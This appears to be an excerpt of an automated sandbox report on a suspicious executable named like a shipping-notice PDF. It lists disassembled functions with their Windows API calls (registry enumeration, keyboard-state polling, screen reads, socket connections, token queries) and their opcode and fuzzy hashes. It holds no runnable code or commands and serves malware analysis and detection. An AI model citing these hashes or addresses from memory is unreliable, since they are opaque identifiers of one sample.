Instruction Fuzzy Hash: BC515975A10205DFCB04EFA8C885DADF7B5BF49310B1480A9EA15AB352DB70EE55CF80

Function 002A2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002A2F75
RegCloseKey.ADVAPI32(?,?), ref: 002A2FA1
RegCloseKey.ADVAPI32(00000000), ref: 002A2FAE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 2e190a5d473f69767802874ec19e1b0f4d2271c7520434622ba655adb273cbe6
Instruction ID: d71cb7215b5f468077ede847bc58eac9f2566144e0b9303004e24a75da6e7cd5
Opcode Fuzzy Hash: 2e190a5d473f69767802874ec19e1b0f4d2271c7520434622ba655adb273cbe6
Instruction Fuzzy Hash: B3514971228204AFD704EF58C881E6AB7F9FF89304F10882DF595972A1DB70E928CF52

Function 002ACCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b6e110a6c5acd5527046de472daf18e98aef2bae333dbb8c4400cddcdfa16f3
Instruction ID: 64d9ba48360b64b5de7da0b78b74eabd501befbb37d9e671d6e0a31c48f07c7f
Opcode Fuzzy Hash: 3b6e110a6c5acd5527046de472daf18e98aef2bae333dbb8c4400cddcdfa16f3
Instruction Fuzzy Hash: CD41D939920509AFC724DF68CC48FA9BF68EB0B310F250175F959A72D1CB70AD61DB90

Function 00291206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002912B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002912DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0029131C

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00291341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00291349

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b9b7eb13256024d98227d3f02bfa5494872d7df1d04c783c19fed49c228eaa2f
Instruction ID: 015b2bebd4691201d6e4924447839bb227416ae6d80e6c39a8c9fed927a2a793
Opcode Fuzzy Hash: b9b7eb13256024d98227d3f02bfa5494872d7df1d04c783c19fed49c228eaa2f
Instruction Fuzzy Hash: 1F411835A10105DFCF05EF64C981AAEBBF5EF09710B148099E90AAB3A2CB31ED61CF51

Function 0025B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0025B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0025B66C
GetAsyncKeyState.USER32(00000001), ref: 0025B691
GetAsyncKeyState.USER32(00000002), ref: 0025B69F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 21c2df04a0b60f473e2bcb68dbcfc8755e36d703ab6a173407c81d401de48e17
Instruction ID: 728329be2cd917e30293bd662314c643f833e79df8da5fb8032ae827417c88b7
Opcode Fuzzy Hash: 21c2df04a0b60f473e2bcb68dbcfc8755e36d703ab6a173407c81d401de48e17
Instruction Fuzzy Hash: 3D417F35528116FFCF1A9F64C844AE9BBB8FB05365F204319F82996290DB30ADA4DF91

Function 0027B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0027B369
PostMessageW.USER32(?,00000201,00000001), ref: 0027B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0027B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0027B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0027B431

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 30f59babedb347b33f4ea562b3867e2580582a17359e2c5cfc966c1c6a834821
Instruction ID: 6ea2e6115784db9e7fb3c82729a70a9a8d890071fc7318f5bf8b4c0757e7de43
Opcode Fuzzy Hash: 30f59babedb347b33f4ea562b3867e2580582a17359e2c5cfc966c1c6a834821
Instruction Fuzzy Hash: 6631A07191021AEFDF04CF68E94DB9E7BB5EB04319F118269F929AA1D1C3B09964CB90

Function 0027DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0027DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0027DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0027DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0027DC52
_wcsstr.LIBCMT ref: 0027DC5C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 74b981a5a35c066ba44febb43a29641a16559e8e5df4406afbd5fbcff974143d
Instruction ID: 7b2eb8e091ab0daf3273bece335ed8a3920f373ea881ddf8bd0297e3feed9e34
Opcode Fuzzy Hash: 74b981a5a35c066ba44febb43a29641a16559e8e5df4406afbd5fbcff974143d
Instruction Fuzzy Hash: 3E212571224101ABEB165F38AD49E7B7BACDF45720F10803EF80DCA181EAB1DC51D660

Function 0027BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0027BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027BCC2
__itow.LIBCMT ref: 0027BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027BD00
__itow.LIBCMT ref: 0027BD11

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c74de28ea3bad502f4eb9c737aa15cdad1b7764ecab162edcbe1db0f081798a6
Instruction ID: c18ad71aa4e9ae8f420266b903dbc6d08341ce93223d2b4cfea53a6dd806dc4d
Opcode Fuzzy Hash: c74de28ea3bad502f4eb9c737aa15cdad1b7764ecab162edcbe1db0f081798a6
Instruction Fuzzy Hash: 3A213B31620218BFDB26AE649C49FDF7A6CAF4A710F108025F94DEB181DB708D2587A1

Function 00286318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 002450E6: _wcsncpy.LIBCMT ref: 002450FA

GetFileAttributesW.KERNEL32(?,?,?,?,002860C3), ref: 00286369
GetLastError.KERNEL32(?,?,?,002860C3), ref: 00286374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002860C3), ref: 00286388
_wcsrchr.LIBCMT ref: 002863AA

Part of subcall function 00286318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002860C3), ref: 002863E0

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 0596fa301ef03d4c55bba5e813316d6ab66e5e69fe8358f3a69a50b3f6abcb99
Instruction ID: 4c123bb35665d8c1d5fe73f5848f24356cd1b745c4773c387f6584b39f91e35f
Opcode Fuzzy Hash: 0596fa301ef03d4c55bba5e813316d6ab66e5e69fe8358f3a69a50b3f6abcb99
Instruction Fuzzy Hash: 592123345362169BDB21BA78AC4AFEA23ACAF06B61F1000B5F445D30C1EAA099A48B54

Function 00298B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00298BD3
WSAGetLastError.WSOCK32(00000000), ref: 00298BE2
connect.WSOCK32(00000000,?,00000010), ref: 00298BFE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 0f8a30d807f0437385a7e2eeac90c33508b3d45be4c90a4c3c62d2b54a236cf8
Instruction ID: ca5944054a008047de7ec57dd508112f8a94b0be9e7b2208bb699f8efe3f6340
Opcode Fuzzy Hash: 0f8a30d807f0437385a7e2eeac90c33508b3d45be4c90a4c3c62d2b54a236cf8
Instruction Fuzzy Hash: 0F21F0312102009FCB14AF28DC89F7EB7A8AF49710F08845AF902AB3D2CB70EC158B61

Function 00298420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00298441
GetForegroundWindow.USER32 ref: 00298458
GetDC.USER32(00000000), ref: 00298494
GetPixel.GDI32(00000000,?,00000003), ref: 002984A0
ReleaseDC.USER32(00000000,00000003), ref: 002984DB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e9010cdd43bd09259790533b718af54bc1a8333ae0787ade382a2bdb7742b799
Instruction ID: 115eca865c8b9241fae93ac57c3a2f4750e8577680fb23905b730deb0a81a733
Opcode Fuzzy Hash: e9010cdd43bd09259790533b718af54bc1a8333ae0787ade382a2bdb7742b799
Instruction Fuzzy Hash: 2721A435A10204AFDB00EFA4DC48A5EBBE9EF48301F148479E85A97251CB70ED04CB50

Function 0025AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
SelectObject.GDI32(?,00000000), ref: 0025AFF2
BeginPath.GDI32(?), ref: 0025B009
SelectObject.GDI32(?,00000000), ref: 0025B033

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 024021a9afd53bf4b4bb50a79273b3e39218ccf162f8857a101511f9c1c5ca88
Instruction ID: 7bc75e9bda15e8369ddec085922ef0ca8cba4d61a11897c8fdf7f704b3e76348
Opcode Fuzzy Hash: 024021a9afd53bf4b4bb50a79273b3e39218ccf162f8857a101511f9c1c5ca88
Instruction Fuzzy Hash: A5217770811209EFDB229F55EC58B9A77ACB710356F14431BFC25521E0C3B25865CF95

Function 0026217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 002621A9
CreateThread.KERNEL32(?,?,002622DF,00000000,?,?), ref: 002621ED
GetLastError.KERNEL32 ref: 002621F7
_free.LIBCMT ref: 00262200
__dosmaperr.LIBCMT ref: 0026220B

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 136c0f85f37f96707bac60c9db1f90928c11ade91137070ae4b1a9b95e4e668a
Instruction ID: 3fa31288d2ca8c8b804dd30de943c8eea3259fbfcafcd2a18acfeab5bfe56d8c
Opcode Fuzzy Hash: 136c0f85f37f96707bac60c9db1f90928c11ade91137070ae4b1a9b95e4e668a
Instruction Fuzzy Hash: F5114832128747AFDB10AFA4EC45D9B7798EF01774B100429FE1886082DB31C8B18EA0

Function 0027ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 908af157d14c8e6c63769c8a51ac9cb62abd590b37451a665bfd801a05cca326
Instruction ID: 5ac8e518f90a5d317e64fe226baf6bd4ddb87b7aea34d0663d7a5f77390d1943
Opcode Fuzzy Hash: 908af157d14c8e6c63769c8a51ac9cb62abd590b37451a665bfd801a05cca326
Instruction Fuzzy Hash: E70169B0210205BFDB114FAAEC4CDAB3BACEF8A365710442EF809C3260DA718C51CB61

Function 00287A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00287A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00287A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00287A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cadb6e1a96e591a553578b6f45bc9787f6b662afd04e59ce2212cfce7e3c8bfe
Instruction ID: d06190663eb2a69cc92af094f6046dd4d04017f0eaefda4fdb0b1ac54f3f7d5f
Opcode Fuzzy Hash: cadb6e1a96e591a553578b6f45bc9787f6b662afd04e59ce2212cfce7e3c8bfe
Instruction Fuzzy Hash: 0D012939C15619EBDF04AFE4EC8CAEDBB78FB08751F150465E502B2290DB7096648BA1

Function 00279ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00279ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00279AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00279B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00279B15
CLSIDFromString.OLE32(?,?), ref: 00279B21

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: d5e644f3ea2f33f21b3cecf82b5f6a7c6f0bb4709ebb4287cb98fcaa704053de
Instruction ID: 8f23a41672aea36668f87d843a8f8da5d09d0aa453e0ffa73ef1af0046cb6677
Opcode Fuzzy Hash: d5e644f3ea2f33f21b3cecf82b5f6a7c6f0bb4709ebb4287cb98fcaa704053de
Instruction Fuzzy Hash: C5014F76610215BFDB118F68ED48F9ABAEDEB44755F148038F909D2210D770DD919BA0

Function 0027AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0027AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0027AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0027AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0027AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0027AAAF

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5cc25c30b3c66913e22e134febb585bd971a60e4f0c251d8dff865ac4fe62aad
Instruction ID: 1a12dbd135dace18cc284fca956fda5c74e2afa467a5413d364e93e07d4c0b9d
Opcode Fuzzy Hash: 5cc25c30b3c66913e22e134febb585bd971a60e4f0c251d8dff865ac4fe62aad
Instruction Fuzzy Hash: EEF0AF352012056FEB101FA4AC8CE6B3BBCFF89764F004029F909C7190DA709C12CB61

Function 0027AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AB10

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6159cc7d88c5d26f5edf1c4c110a3e03b9b66922c4854664c86e4db7b289884e
Instruction ID: cd84d8d3bd42ee4b9fad9f86b96332d8ea15071dc8fb9d5656d8f4a5dfb30fd2
Opcode Fuzzy Hash: 6159cc7d88c5d26f5edf1c4c110a3e03b9b66922c4854664c86e4db7b289884e
Instruction Fuzzy Hash: EAF04F752112096FEB110FA5FC88E6B3B6DFF85768F004039F949C7190CA7098129A61

